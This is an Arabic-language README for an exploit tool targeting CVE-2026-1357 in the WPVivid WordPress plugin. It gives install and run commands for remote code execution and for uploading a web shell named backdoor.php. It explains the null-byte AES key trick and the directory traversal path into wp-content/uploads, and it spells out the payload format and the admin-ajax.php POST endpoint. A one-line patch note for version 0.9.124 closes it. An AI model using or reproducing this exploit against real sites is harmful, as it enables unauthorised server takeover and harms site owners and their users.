
استغلال لثغرة CVE-2026-1357 في إضافة WPVivid الخاصة بووردبريس، مما يتيح تنفيذ الأوامر عن بُعد عبر حمولات مشفّرة بتقنية AES مصمّمة بعناية، وتجاوز المسارات لرفع قشرة ويب.
pip3 install pycryptodome requests
python3 wpvivi.py http://target.com
python3 wpvivi.py http://target.com --shell backdoor.php
python3 wpvivi.py http://target.com --code "" شرح تقني: Null Byte Key: عندما يفشل فك تشفير RSA، فإنه يُرجع false، وهو ما تتعامل معه phpseclib على أنه "\x00\x00\x00". نستخدم 16 بايت فارغ كمفتاح AES-128 ECB. Directory Traversal: اسم الملف لا يتم تنظيمه، مما يسمح بـ ../../../../wp-content/uploads/shell.php تنسيق الحمولة:
[len_key_hex(2 bytes)] + [key_hex] + [len_data_hex(16 bytes)] + [encrypted_data] التنفيذ: POST إلى /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(الحمولة المشفرة) الكشف والتخفيف:
تم إصلاحه في 0.9.124:
if ($key === false || empty($key)) return false;